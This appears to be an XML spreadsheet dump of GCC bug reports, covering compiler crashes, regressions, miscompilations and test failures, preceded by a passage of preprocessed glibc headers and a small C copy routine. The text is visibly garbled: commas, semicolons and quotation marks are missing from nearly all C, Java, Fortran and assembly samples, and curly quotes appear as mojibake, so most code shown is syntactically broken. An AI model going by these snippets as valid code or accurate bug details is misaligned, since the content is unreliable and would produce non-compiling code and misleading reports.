# 26 /usr/include/sys/select.h 2 3
# 1 /usr/include/bits/types.h 1 3
# 29 /usr/include/sys/select.h 2 3
# 1 /usr/include/bits/select.h 1 3
# 32 /usr/include/sys/select.h 2 3
# 1 /usr/include/bits/sigset.h 1 3
# 23 /usr/include/bits/sigset.h 3
typedef int __sig_atomic_t
typedef struct
  {
    unsigned long int __val[(1024 / (8 * sizeof (unsigned long int)))]
  } __sigset_t
# 35 /usr/include/sys/select.h 2 3
# 1 /usr/include/time.h 1 3
# 83 /usr/include/time.h 3
struct timespec
  {
    long int tv_sec
    long int tv_nsec
  }
# 39 /usr/include/sys/select.h 2 3
struct timeval
typedef __fd_mask fd_mask
typedef __fd_set fd_set
# 74 /usr/include/sys/select.h 3
extern int __select (int __nfds __fd_set *__readfds __fd_set *__writefds __fd_set *__exceptfds struct timeval *__timeout) 
extern int select (int __nfds __fd_set *__readfds __fd_set *__writefds __fd_set *__exceptfds struct timeval *__timeout) 
# 195 /usr/include/sys/types.h 2 3
# 1 /usr/include/sys/sysmacros.h 1 3
# 198 /usr/include/sys/types.h 2 3
typedef __blkcnt_t blkcnt_t
typedef __fsblkcnt_t fsblkcnt_t
typedef __fsfilcnt_t fsfilcnt_t
# 340 /usr/include/stdlib.h 2 3
extern int32_t random (void) 
extern void srandom (unsigned int __seed) 
extern void * initstate (unsigned int __seed void * __statebuf size_t __statelen) 
extern void * setstate (void * __statebuf) 
struct random_data
  {
    int32_t *fptr
    int32_t *rptr
    int32_t *state
    int rand_type
    int rand_deg
    int rand_sep
    int32_t *end_ptr
  }
extern int random_r (struct random_data *__restrict __buf int32_t *__restrict __result) 
extern int srandom_r (unsigned int __seed struct random_data *__buf) 
extern int initstate_r (unsigned int __seed void * __restrict __statebuf size_t __statelen struct random_data *__restrict __buf) 
extern int setstate_r (void * __restrict __statebuf struct random_data *__restrict __buf) 
extern int rand (void) 
extern void srand (unsigned int __seed) 
extern int rand_r (unsigned int *__seed) 
extern double drand48 (void) 
extern double erand48 (unsigned short int __xsubi[3]) 
extern long int lrand48 (void) 
extern long int nrand48 (unsigned short int __xsubi[3]) 
extern long int mrand48 (void) 
extern long int jrand48 (unsigned short int __xsubi[3]) 
extern void srand48 (long int __seedval) 
extern unsigned short int *seed48 (unsigned short int __seed16v[3]) 
extern void lcong48 (unsigned short int __param[7]) 
struct drand48_data
  {
    unsigned short int x[3]
    unsigned short int a[3]
    unsigned short int c
    unsigned short int old_x[3]
    int init
  }
extern int drand48_r (struct drand48_data *__restrict __buffer double *__restrict __result) 
extern int erand48_r (unsigned short int __xsubi[3] struct drand48_data *__restrict __buffer double *__restrict __result) 
extern int lrand48_r (struct drand48_data *__restrict __buffer long int *__restrict __result) 
extern int nrand48_r (unsigned short int __xsubi[3] struct drand48_data *__restrict __buffer long int *__restrict __result) 
extern int mrand48_r (struct drand48_data *__restrict __buffer long int *__restrict __result) 
extern int jrand48_r (unsigned short int __xsubi[3] struct drand48_data *__restrict __buffer long int *__restrict __result) 
extern int srand48_r (long int __seedval struct drand48_data *__buffer) 
extern int seed48_r (unsigned short int __seed16v[3] struct drand48_data *__buffer) 
extern int lcong48_r (unsigned short int __param[7] struct drand48_data *__buffer) 
# 474 /usr/include/stdlib.h 3
extern void * malloc (size_t __size) 
extern void * calloc (size_t __nmemb size_t __size) 
extern void * realloc (void * __ptr size_t __size) 
extern void free (void * __ptr) 
extern void cfree (void * __ptr) 
# 1 /usr/include/alloca.h 1 3
# 22 /usr/include/alloca.h 3
# 1 /usr/include/features.h 1 3
# 23 /usr/include/alloca.h 2 3
# 1 /usr/local/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.0.4/include/stddef.h 1 3
# 26 /usr/include/alloca.h 2 3
extern void * alloca (size_t __size) 
# 493 /usr/include/stdlib.h 2 3
extern void * valloc (size_t __size) 
extern void abort (void) __attribute__ ((__noreturn__))
extern int atexit (void (*__func) (void)) 
extern int __on_exit (void (*__func) (int __status void * __arg) void * __arg) 
extern int on_exit (void (*__func) (int __status void * __arg) void * __arg) 
extern void exit (int __status) __attribute__ ((__noreturn__))
# 530 /usr/include/stdlib.h 3
extern char *getenv (__const char *__name) 
extern char *__secure_getenv (__const char *__name) 
extern int putenv (char *__string) 
extern int setenv (__const char *__name __const char *__value int __replace) 
extern void unsetenv (__const char *__name) 
extern int clearenv (void) 
# 566 /usr/include/stdlib.h 3
extern char *mktemp (char *__template) 
extern int mkstemp (char *__template) 
extern int system (__const char *__command) 
# 595 /usr/include/stdlib.h 3
extern char *realpath (__const char *__restrict __name char *__restrict __resolved) 
typedef int (*__compar_fn_t) (__const void * __const void *)
# 612 /usr/include/stdlib.h 3
extern void * bsearch (__const void * __key __const void * __base size_t __nmemb size_t __size __compar_fn_t __compar)
extern void qsort (void * __base size_t __nmemb size_t __size __compar_fn_t __compar)
extern int abs (int __x) __attribute__ ((__const__))
extern long int labs (long int __x) __attribute__ ((__const__))
# 634 /usr/include/stdlib.h 3
extern div_t div (int __numer int __denom) __attribute__ ((__const__))
extern ldiv_t ldiv (long int __numer long int __denom)
     __attribute__ ((__const__))
# 651 /usr/include/stdlib.h 3
extern char *ecvt (double __value int __ndigit int *__restrict __decpt int *__restrict __sign) 
extern char *fcvt (double __value int __ndigit int *__restrict __decpt int *__restrict __sign) 
extern char *gcvt (double __value int __ndigit char *__buf) 
extern char *qecvt (long double __value int __ndigit int *__restrict __decpt int *__restrict __sign) 
extern char *qfcvt (long double __value int __ndigit int *__restrict __decpt int *__restrict __sign) 
extern char *qgcvt (long double __value int __ndigit char *__buf) 
extern int ecvt_r (double __value int __ndigit int *__restrict __decpt int *__restrict __sign char *__restrict __buf size_t __len) 
extern int fcvt_r (double __value int __ndigit int *__restrict __decpt int *__restrict __sign char *__restrict __buf size_t __len) 
extern int qecvt_r (long double __value int __ndigit int *__restrict __decpt int *__restrict __sign char *__restrict __buf size_t __len) 
extern int qfcvt_r (long double __value int __ndigit int *__restrict __decpt int *__restrict __sign char *__restrict __buf size_t __len) 
# 695 /usr/include/stdlib.h 3
extern int mblen (__const char *__s size_t __n) 
extern int mbtowc (wchar_t *__restrict __pwc __const char *__restrict __s size_t __n) 
extern int wctomb (char *__s wchar_t __wchar) 
extern size_t mbstowcs (wchar_t *__restrict __pwcs __const char *__restrict __s size_t __n) 
extern size_t wcstombs (char *__restrict __s __const wchar_t *__restrict __pwcs size_t __n) 
# 718 /usr/include/stdlib.h 3
extern int rpmatch (__const char *__response) 
# 2 foo.c 2
char *copy (char *src)
{
    char *cp
    char dest[1024]
    cp = dest
    ({ extern int __sprintf (char *__dest char *__fmt ...) __attribute__ ((__alias__ (sprintf))) if (sizeof (dest) == sizeof (char *)) __sprintf (dest %s src) else snprintf (dest sizeof (dest) %s src) })
    return (cp)
}
main (int argc char * const *argv)
{
    printf (%s\n copy (argv[1]))
    exit (0)
}</t>
  </si>
  <si>
    <t>keithr</t>
  </si>
  <si>
    <t>GCC-9531</t>
  </si>
  <si>
    <t>Problem with -fprefetch-loop-arrays -funroll-loops</t>
  </si>
  <si>
    <t xml:space="preserve">
	Using -fprefetch-loop-arrays with -funroll-loops results in
redundant prefetch instructions.
Release:
3.3 20021212 (experimental)
Environment:
System: Linux escape 2.4.18-18.8.0 #1 Thu Nov 14 00:10:29 EST 2002 i686 i686 i386 GNU/Linux
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /home/green/FSF/GCC/HEAD/gcc/configure --prefix=/home/green/latest/i --enable-languages=cc++java : (reconfigured)
How-To-Repeat:
	Compile the following for mips4 with -fprefetch-loop-arrays
-funroll-loops and look for the prefetch instructions in the asm
output.
void
foo (int **outptr int **inptr)
{
  int col
  for (col = 1024*3 col &gt; 0 col--) {
    outptr[2] = *inptr++
    outptr[1] = *inptr++
    outptr[0] = *inptr++
    outptr += 3
  }
}
I see the following sequence of instructions in the output:
	pref	70($4)
	pref	70($4)
	pref	70($4)
	pref	60($5)
	pref	60($5)
	pref	60($5)
	pref	60($5)
	pref	60($5)
	pref	60($5)</t>
  </si>
  <si>
    <t>GCC-45302</t>
  </si>
  <si>
    <t>g++.dg/lto/20100723-1 cp_lto_20100723-1_0.o-cp_lto_20100723-1_0.o link -fcompare-debug -flto/-fwhopr ICE</t>
  </si>
  <si>
    <t>On x86_64-apple-darwin10 since the the g++.dg/lto/20100723-1_0.C testcase was added it has failed ICE'd the compiler with the failures...
FAIL: g++.dg/lto/20100723-1 cp_lto_20100723-1_0.o-cp_lto_20100723-1_0.o link -fcompare-debug -flto (internal compiler error)
FAIL: g++.dg/lto/20100723-1 cp_lto_20100723-1_0.o-cp_lto_20100723-1_0.o link -fcompare-debug -fwhopr (internal compiler error)
at both -m32. This appears as...
Executing on host: /Users/howarth/build-trunk/gcc/testsuite/g++/../../g++ -B/Users/howarth/build-trunk/gcc/testsuite/g++/../../ cp_lto_20100723-1_0.o  -nostdinc++ -I/Users/howarth/build-trunk/x86_64-apple-darwin10.5.0/i386/libstdc++-v3/include/x86_64-apple-darwin10.5.0 -I/Users/howarth/build-trunk/x86_64-apple-darwin10.5.0/i386/libstdc++-v3/include -I/Users/howarth/gcc-trunk/libstdc++-v3/libsupc++ -I/Users/howarth/gcc-trunk/libstdc++-v3/include/backward -I/Users/howarth/gcc-trunk/libstdc++-v3/testsuite/util -fmessage-length=0 -fcompare-debug -flto     -L/Users/howarth/build-trunk/x86_64-apple-darwin10.5.0/i386/libstdc++-v3/src/.libs  -B/Users/howarth/build-trunk/x86_64-apple-darwin10.5.0/i386/libstdc++-v3/src/.libs  -L/Users/howarth/build-trunk/x86_64-apple-darwin10.5.0/i386/libstdc++-v3/src/.libs -L/Users/howarth/build-trunk/x86_64-apple-darwin10.5.0/i386/libiberty  -multiply_defined suppress     -m32 -o g++-dg-lto-20100723-1-01    (timeout = 300)
In file included from /Users/howarth/gcc-trunk/gcc/testsuite/g++.dg/lto/20100723-1_0.C:14:0
                 from :1:
/Users/howarth/gcc-trunk/gcc/testsuite/g++.dg/lto/20100723-1_0.C: In member function 'f':
/Users/howarth/gcc-trunk/gcc/testsuite/g++.dg/lto/20100723-1_0.C:5:24: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
g++: error: during -fcompare-debug recompilation
g++: error: cp_lto_20100723-1_0.o: -fcompare-debug failure (length)
lto-wrapper: /Users/howarth/build-trunk/gcc/testsuite/g++/../../g++ returned 1 exit status
collect2: lto-wrapper returned 1 exit status
compiler exited with status 1
and backtraces as...
gdb /Users/howarth/build-trunk/gcc/testsuite/g++/../../lto1
GNU gdb 6.3.50-20050815 (Apple version gdb-1469) (Wed May  5 04:36:56 UTC 2010)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x86_64-apple-darwin...Reading symbols for shared libraries ............. done
(gdb) r -fPIC -quiet -dumpdir ./ -dumpbase g++-dg-lto-20100723-1-01 -mmacosx-version-min=10.6.5 -m32 -mtune=generic -auxbase-strip /var/folders/1C/1CdoNxmNFHyOIjNBLNuJh++++TM/-Tmp-//ccQ6pvn8.lto.o -gtoggle -w -version -fmessage-length=0 -fcompare-debug=-gtoggle -fcompare-debug-second -o /dev/null @/var/folders/1C/1CdoNxmNFHyOIjNBLNuJh++++TM/-Tmp-//cccqmDPY -frandom-seed=0x7d9c35c1 -fdump-final-insns=cp_lto_20100723-1_0.gk.gkd
Starting program: /Users/howarth/build-trunk/gcc/lto1 -fPIC -quiet -dumpdir ./ -dumpbase g++-dg-lto-20100723-1-01 -mmacosx-version-min=10.6.5 -m32 -mtune=generic -auxbase-strip /var/folders/1C/1CdoNxmNFHyOIjNBLNuJh++++TM/-Tmp-//ccQ6pvn8.lto.o -gtoggle -w -version -fmessage-length=0 -fcompare-debug=-gtoggle -fcompare-debug-second -o /dev/null @/var/folders/1C/1CdoNxmNFHyOIjNBLNuJh++++TM/-Tmp-//cccqmDPY -frandom-seed=0x7d9c35c1 -fdump-final-insns=cp_lto_20100723-1_0.gk.gkd
Reading symbols for shared libraries .++++++++++++..... done
GNU GIMPLE (GCC) version 4.6.0 20100816 (experimental) (x86_64-apple-darwin10.5.0)
	compiled by GNU C version 4.6.0 20100816 (experimental) GMP version 4.3.2 MPFR version 2.4.2-p3 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU GIMPLE (GCC) version 4.6.0 20100816 (experimental) (x86_64-apple-darwin10.5.0)
	compiled by GNU C version 4.6.0 20100816 (experimental) GMP version 4.3.2 MPFR version 2.4.2-p3 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Program received signal EXC_BAD_ACCESS Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x0000000000000000
gen_tagged_type_die (type= context_die= usage=) at ../../gcc-trunk/gcc/dwarf2out.c:7869
7869	  return TYPE_SYMTAB_DIE (type)
(gdb) bt
#0  gen_tagged_type_die (type= context_die= usage=) at ../../gcc-trunk/gcc/dwarf2out.c:7869
#1  0x00000001002f9f9b in gen_type_die_with_usage (type=0x14251e3f0 context_die=0x14251b000 usage=DINFO_USAGE_DIR_USE) at ../../gcc-trunk/gcc/dwarf2out.c:20035
(gdb)</t>
  </si>
  <si>
    <t>GCC-51163</t>
  </si>
  <si>
    <t>gcc.dg/tm/alias-1.c failure</t>
  </si>
  <si>
    <t>This is a missed optimization that broke after the trunk-&gt;transactional-memory-branch merge on 2011-09-14.  The failure has been XFAILed but should eventually be fixed.</t>
  </si>
  <si>
    <t>aldyh</t>
  </si>
  <si>
    <t>GCC-6942</t>
  </si>
  <si>
    <t>[3.3 regression] Error detected at g-spipat.adb:4828:7 (cygwin)</t>
  </si>
  <si>
    <t>cygwin bootstrap of 3.2 fails building g-spipat.ada
The failure was introduced:
 - after 2002-03-06 06:00 UTC
 - before 2002-03-06 12:00 UTC
The changes in this interval are
+Wed Mar  6 11:28:19 CET 2002  Jan Hubicka  
+
+       * predict.c (estimate_bb_frequencies): Do not reload the
+       frequencies from notes.
+
+Wed Mar  6 10:59:39 CET 2002  Jan Hubicka  
+
+       * cfgrtl.c (delete_insn_and_edges delete_insn_chain_and_edges): New.
+       * rtl.h (delete_insn_and_edges delete_insn_chain_and_edges): Declare
+
+       * basic-block.h (update_life_info update_life_info_in_dirty_blocks
+       delete_noop_moves): Return indeger.
+       * flow.c (ndead): New variable.
+       (propagate_block_delete_insn): Use delete_insn_and_edges remove
+       BB argument update callers.
+       (propagate_block_delete_libcall): Use delete_insn_chain_and_edges.
+       (life_analysis): Do not call purge_all_dead_edges.
+       (update_life_info): Return number of deleted insns print statistics.
+       (update_life_info_in_dirty_blocks): likewise.
+       (delete_noop_moves): Use delete_insn_and_edges print statistics
+       return number of insns deleted.
+
+       * cse.c: Include timevar.h
+       (delete_trivially_dead_insns): Kill preserve_basic_blocks argument
+       iterate until stabilizes print statistics return number of killed
+       insns.
+       * Makefile.in: (cse.o): Add timevar.h dependency
+       * rtl.h (delete_trivially_dead_insns): New.
+       * timever.def: Add TV_DELETE_TRIVIALLY_DEAD timer.
+       * toplev.c (rest_of_compilation): Update callers.
+
+       * cfgcleanup.c (try_optimize_cfg): Kill blocks.
+       (try_optimize_cfg): Do not update liveness.
+       (cleanup-cfg): Loop until try_optimize_cfg and dead code
+       removal stabilizes use delete_trivially_dead_insns.
+
+       * cfgrtl.c (verify_flow_info): Sanity check outgoing edges.
+
+2002-03-05  Zack Weinberg  
+
+       * cppmain.c (setup_callbacks): Disable #pragma and #ident
+       callbacks when processing assembly language.
+
../../xgcc -B../../ -c -g -O2 -g -O2 -W -Wall -gnatpg -I. -I/usr/local/src/gcc-j
/gcc/ada g-spipat.adb
g-spipat.adb: In function `gnat.spitbol.patterns.xmatch':
g-spipat.adb:3599: Call edges for non-call insn in bb 0
+===========================GNAT BUG DETECTED==============================+
| 3.1 (20020212) (i686-pc-cygwin) verify_flow_info failed                  |
| Error detected at g-spipat.adb:4828:7                                    |
| Please submit bug report by email to gcc-bugs@gcc.gnu.org.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use plain ASCII or MIME attachment).                                    |
| See gnatinfo.txt for full info on procedure for submitting bugs.         |
+==========================================================================+
Please include these source files with error report
compilation abandoned
make[2]: *** [g-spipat.o] Error 1
make[2]: Leaving directory `/usr/local/obj/gcc-ada-j/gcc/ada/rts'
make[1]: *** [gnatlib] Error 2
make[1]: Leaving directory `/usr/local/obj/gcc-ada-j/gcc/ada'
make: *** [gnatlib] Error 2
Release:
gcc-3.3 and mainline
Environment:
i686-pc-cygwin</t>
  </si>
  <si>
    <t>GCC-51919</t>
  </si>
  <si>
    <t>g++.dg/pch/mangle1.* test FAILs without LTO</t>
  </si>
  <si>
    <t>The new g++.dg/pch/mangle1.* test FAILs on Tru64 UNIX which has no LTO support:
FAIL: ./mangle1.H  -g (test for excess errors)
FAIL: g++.dg/pch/mangle1.C -g
FAIL: g++.dg/pch/mangle1.C -g assembly comparison
FAIL: ./mangle1.H  -O2 -g (test for excess errors)
FAIL: g++.dg/pch/mangle1.C -O2 -g
FAIL: g++.dg/pch/mangle1.C -O2 -g assembly comparison
FAIL: ./mangle1.H  -O2 (test for excess errors)
FAIL: g++.dg/pch/mangle1.C -O2
FAIL: g++.dg/pch/mangle1.C -O2 assembly comparison
Compiling mangle1.H gives
FAIL: ./mangle1.H  -g (test for excess errors)
Excess errors:
cc1plus: error: LTO support has not been enabled in this configuration
This one can be avoided with dg-require-effective-target lto.
The next two failures
pch file 'mangle1.H.gch' missing
FAIL: g++.dg/pch/mangle1.C -g
assembly file 'mangle1.s' missing
can not unfortunately.  It seems that dg-pch.exp doesn't check for dg- 
directives in mangle1.C.
FAIL: g++.dg/pch/mangle1.C -g assembly comparison</t>
  </si>
  <si>
    <t>GCC-56342</t>
  </si>
  <si>
    <t>MATMUL with PARAMETER: Simplification usually doesn't work</t>
  </si>
  <si>
    <t>This is a follow up to PR 56318 reported by Alberto Luaces at http://gcc.gnu.org/ml/fortran/2013-02/msg00074.html
The wrong-code issue has been fixed however it was noted there that MATMUL with parameters is not get optimized.
Simplified test case:
!------------------------------------
integer parameter :: A(32) = reshape([123456][32])
integer parameter :: B(23) = reshape([111111][23])
integer parameter :: m1 = 1
print '(3i3)'    matmul(AB) ! Does not get optimized
print '(3i3)' m1*matmul(AB) ! Is optimized
end
!------------------------------------
(See the other PR for the original test case - and gfortran.dg/matmul_9.f90 they all use the multiplication - which lead to simplification and hit a now fixed wrong-code bug.)
The m1* is crucial. When gfc_simplify_matmul is called initially it returns
NULL as  is_constant_array_expr (matrix_a) is false.
The m1* causes a re-evaluation of the RHS expression namely in
gfc_simplify_expr:
      for (ap = p-&gt;value.function.actual ap ap = ap-&gt;next)
        if (gfc_simplify_expr (ap-&gt;expr type) == FAILURE)
That converts an EXPR_VARIABLE with flavor FL_PARAMETER into an EXPR_ARRAY
which can then be processed by calling gfc_simplify_matmul.
It seems as if one has to run gfc_simplify_expr â€“ the question is whether that shouldn't then also be done for other intrinsics?</t>
  </si>
  <si>
    <t>GCC-34450</t>
  </si>
  <si>
    <t>[4.3 Regression] compile takes up 1.8 GB RAM at -O1</t>
  </si>
  <si>
    <t>Compile the attached source with -O1 and it will take roughly 1.8 GB RAM
on x86_64 and over a minute with current trunk.  4.2 took a few seconds
and less than 200 MB RAM.  Granted this is with checking on because
I haven't had a chance to compile a version without checking but this
still looks like a regression.  Hopefully someone (Richi?) can take a look.</t>
  </si>
  <si>
    <t>GCC-29664</t>
  </si>
  <si>
    <t>[4.3 Regression] FAIL: g++.old-deja/g++.eh/spec2.C execution test</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gcc-4.3/objdir/gcc/testsuite/g++/../../g++ -B/home
/dave/gcc-4.3/objdir/gcc/testsuite/g++/../../ /home/dave/gcc-4.3/gcc/gcc/testsui
te/g++.old-deja/g++.eh/spec2.C  -nostdinc++ -I/home/dave/gcc-4.3/objdir/hppa-lin
ux/libstdc++-v3/include/hppa-linux -I/home/dave/gcc-4.3/objdir/hppa-linux/libstd
c++-v3/include -I/home/dave/gcc-4.3/gcc/libstdc++-v3/libsupc++ -I/home/dave/gcc-
4.3/gcc/libstdc++-v3/include/backward -I/home/dave/gcc-4.3/gcc/libstdc++-v3/test
suite/util -fmessage-length=0   -ansi -pedantic-errors -Wno-long-long    -L/home
/dave/gcc-4.3/objdir/hppa-linux/./libstdc++-v3/src/.libs  -L/home/dave/gcc-4.3/o
bjdir/hppa-linux/./libstdc++-v3/src/.libs -L/home/dave/gcc-4.3/objdir/hppa-linux
/./libiberty  -lm   -o ./spec2.exe    (timeout = 300)
PASS: g++.old-deja/g++.eh/spec2.C (test for excess errors)
Setting LD_LIBRARY_PATH to .:/home/dave/gcc-4.3/objdir/hppa-linux/./libstdc++-v3
/src/.libs:/home/dave/gcc-4.3/objdir/hppa-linux/./libstdc++-v3/src/.libs:/home/d
ave/gcc-4.3/objdir/gcc:.:/home/dave/gcc-4.3/objdir/hppa-linux/./libstdc++-v3/src
/.libs:/home/dave/gcc-4.3/objdir/hppa-linux/./libstdc++-v3/src/.libs:/home/dave/
gcc-4.3/objdir/gcc:/home/dave/gcc-4.3/objdir/hppa-linux/libstdc++-v3/.libs:/home
/dave/gcc-4.3/objdir/hppa-linux/libmudflap/.libs:/home/dave/gcc-4.3/objdir/hppa-
linux/libssp/.libs:/home/dave/gcc-4.3/objdir/hppa-linux/libgomp/.libs:/home/dave
/gcc-4.3/objdir/./gcc:/home/dave/gcc-4.3/objdir/./prev-gcc
FAIL: g++.old-deja/g++.eh/spec2.C execution test</t>
  </si>
  <si>
    <t>GCC-529</t>
  </si>
  <si>
    <t>-Wshadow warns on function prototypes vs. global vars</t>
  </si>
  <si>
    <t>When I compile the following code with 'gcc -Wshadow'
I get a warning that 'foobar' shadows a global variable:
    int foobar
    int func_prototype(int foobar)
This happens most often when #including header files
which use descriptive names in their function prototypes
that also happen to correspond to names of global symbols.
(I see this often with 'index' on systems that define
the function 'index()' in string.h.)
It is obvious that no bug /could/ happen in this case as
the scope of variable name in the function prototype extends
only to the end of the prototype--it cannot be used as
a variable in any actual code.  Variable names in function
prototypes are intended to provide documentation only
since it is impossible to use the symbol for any purpose
other than to explain to the human reading the code what
the parameter is used for.  Having these names trigger 
warnings would seem to discourage their widespread use.
Regards
--Joe
Release:
2.95.2 19991024 CVS 20010209
Environment:
Linux 2.2.17 RedHat 6.0
How-To-Repeat:
gcc -Wshadow shadow.c</t>
  </si>
  <si>
    <t>im14u2c</t>
  </si>
  <si>
    <t>GCC-57112</t>
  </si>
  <si>
    <t>-march=x86-64 not documented</t>
  </si>
  <si>
    <t>Hello
for people who have a gcc that was configured with some non-default --with-arch but who want to build a generic binary an option like -march=generic would be useful. It seems that the right spelling is -march=x86-64 but I couldn't find that documented in invoke.texi.</t>
  </si>
  <si>
    <t>GCC-42549</t>
  </si>
  <si>
    <t>Incorrect 3DNow! code generated</t>
  </si>
  <si>
    <t>[forwarded from http://bugs.debian.org/560812]
With the following simple test file the 3DNow! generated code is
incorrect with final _m_pfsub generated as pfsubr %mm0%mm0 thus
producing completely incorrect result.
seen with current branches and trunk.
  Matthias
*** main.c
#include 
void Butterfly_3(__m64 *D__m64 SCunsigned int IStepunsigned int Off)
{ __m64 TT1T2
  T        = _m_pfmul(D[Off+1] SC)
  T1       = D[Off+0]
  D[Off+0] = _m_pfadd(T1 T)
  D[Off+1] = _m_pfsub(T1 T)
}
The command line is:
gcc -march=athlon -S -O3 main.c
The generated code is:
*** main.s
    .file    main.c
    .text
    .p2align 415
.globl Butterfly_3
    .type    Butterfly_3 @function
Butterfly_3:
    pushl    %ebp
    movl    %esp %ebp
    movl    8(%ebp) %edx
    movl    16(%ebp) %ecx
    leal    8(%edx%ecx8) %eax
    leal    (%edx%ecx8) %edx
    pfmul    (%eax) %mm0
    movq    (%edx) %mm1
    movq    %mm1 %mm2
    pfadd    %mm0 %mm2
    pfsubr    %mm0 %mm0
    movq    %mm2 (%edx)
    movq    %mm0 (%eax)
    leave
    ret
    .size    Butterfly_3 .-Butterfly_3
    .ident    GCC: (Debian 4.4.2-4) 4.4.2
    .section    .note.GNU-stack@progbits</t>
  </si>
  <si>
    <t>GCC-46613</t>
  </si>
  <si>
    <t>m32c fails to build - m32c_conditional_register_usage missing for m32c-pragma.c</t>
  </si>
  <si>
    <t>In r167020 m32c_conditional_register_usage was made sattic and removed
from m32c-protos.h .  However this function is needed in m32c-pragma.c .
gcc -c  -DIN_GCC_FRONTEND -DIN_GCC_FRONTEND -g -O2 -DIN_GCC -DCROSS_DIRECTORY_STRUCTURE  -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../../gcc/gcc -I../../../gcc/gcc/. -I../../../gcc/gcc/../include -I../../../gcc/gcc/../libcpp/include  -I../../../gcc/gcc/../libdecnumber -I../../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber    -I. -I. -I../../../gcc/gcc -I../../../gcc/gcc/. -I../../../gcc/gcc/../include -I../../../gcc/gcc/../libcpp/include  -I../../../gcc/gcc/../libdecnumber -I../../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber   ../../../gcc/gcc/config/m32c/m32c-pragma.c
../../../gcc/gcc/config/m32c/m32c-pragma.c: In function â€˜m32c_pragma_memregsâ€™:
../../../gcc/gcc/config/m32c/m32c-pragma.c:74:8: error: implicit declaration of function â€˜m32c_conditional_register_usageâ€™ [-Werror=implicit-function-declaration]</t>
  </si>
  <si>
    <t>GCC-7568</t>
  </si>
  <si>
    <t>Runtime.exec ignores directory argument</t>
  </si>
  <si>
    <t xml:space="preserve">	Runtime.exec ignores the File argument which specifies the
        directory to run the command in.
Release:
3.3 20020810 (experimental)
Environment:
System: Linux churchill 2.4.3-12 #1 Fri Jun 8 15:05:56 EDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-languages=c++java --enable-threads=posix --enable-shared --prefix=/scratch/app/gcc --enable-hash-synchronization : (reconfigured)
How-To-Repeat:
        ExecDir2.java:
import java.io.File
public class ExecDir2 {
    private static void runPwdInDir(String dir) throws Exception {
        Process proc =
            Runtime.getRuntime().exec(/bin/pwd null
                    dir != null ? new File(dir) : null)
        int status = proc.waitFor()
        byte[] buf = new byte[proc.getInputStream().available()]
        proc.getInputStream().read(buf 0 buf.length)
        System.out.write(buf 0 buf.length)
    }
    public static void main(String[] args) throws Exception {
        runPwdInDir(/)
    }
}
 javac ExecDir2.java
 /bin/pwd 
/home/user/jmr/gcj_test/exec_dir
 gij ExecDir2
/home/user/jmr/gcj_test/exec_dir
 java ExecDir2
/</t>
  </si>
  <si>
    <t>jmr</t>
  </si>
  <si>
    <t>GCC-470</t>
  </si>
  <si>
    <t>bind2nd or mem_fun doesn't take a function with reference argument</t>
  </si>
  <si>
    <t>The following code doesn't compile.
I'm not an expert in C++ but I believe it's legal.
Release:
2.95.2 CVS 3.0 (20010506)
Environment:
IRIX 6.5
How-To-Repeat:
g++ test.cpp</t>
  </si>
  <si>
    <t>paisa</t>
  </si>
  <si>
    <t>GCC-47502</t>
  </si>
  <si>
    <t>[x32] canâ€™t find a register in class â€˜SIREGâ€™ while reloading â€˜asmâ€™</t>
  </si>
  <si>
    <t>On x32 branch I got
[hjl@gnu-6 ilp32-19]$ cat x.i
int
foo (const void *set void *oset)
{
  unsigned int resultvar
  asm volatile (int $0x80\n\t
                : =a (resultvar)
                : 0 (14) c ((set)) d ((oset)) S (8)
                : memory cc)
  return resultvar
}
[hjl@gnu-6 ilp32-19]$ make
/export/build/gnu/gcc-x32/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc-x32/build-x86_64-linux/gcc/ -S -o x.s -mx32 -O -dp   x.i
x.i: In function â€˜fooâ€™:
x.i:5:3: error: canâ€™t find a register in class â€˜SIREGâ€™ while reloading â€˜asmâ€™
x.i:5:3: error: â€˜asmâ€™ operand has impossible constraints
make: *** [x.s] Error 1
[hjl@gnu-6 ilp32-19]$</t>
  </si>
  <si>
    <t>GCC-55486</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/sms-7.c (internal compiler error)</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/sms-7.c (internal compiler error)
FAIL: gcc.dg/sms-7.c (test for excess errors)
Target: arm-none-eabi
gcc.dg/sms-7.c:17:1: internal compiler error: in schedule_reg_moves at modulo-sched.c:725
Bisection shows regression appears with revision 193595
arm-none-eabi/obj/gcc2/gcc/xgcc -Barm-none-eabi/obj/gcc2/gcc/ src/gcc/gcc/testsuite/gcc.dg/sms-7.c gcc_tg.o -fno-diagnostics-show-caret -O3 -fmodulo-sched -fstrict-aliasing -fdump-rtl-sms -fmodulo-sched-allow-regmoves --param sms-min-sc=1 -specs=rdimon.specs -Wa-mno-warn-deprecated  -Wl-wrapexit -Wl-wrap_exit -Wl-wrapmain -Wl-wrapabort -lm   -o ./sms-7.exe
Thanks
Kyrill</t>
  </si>
  <si>
    <t>kyrylo.tkachov</t>
  </si>
  <si>
    <t>GCC-8090</t>
  </si>
  <si>
    <t>std::ofstream::write() wont compile when passed unsigned char[] as an argument in gcc-3.2</t>
  </si>
  <si>
    <t>The following progra is valid but will not compile under gcc-3.2. I also tried gcc-3.0.2 which has same problem:
#include 
#include 
int main(void)
{
  unsigned char buffer[2]
  buffer[0] = 0
  buffer[1] = 1
  std::ofstream outfile(outfile)
  if (!outfile.good())
  {
    std::cerr &lt;&lt; Error Opening Output File.\n
    return 1
  }
  outfile.put(buffer[0])
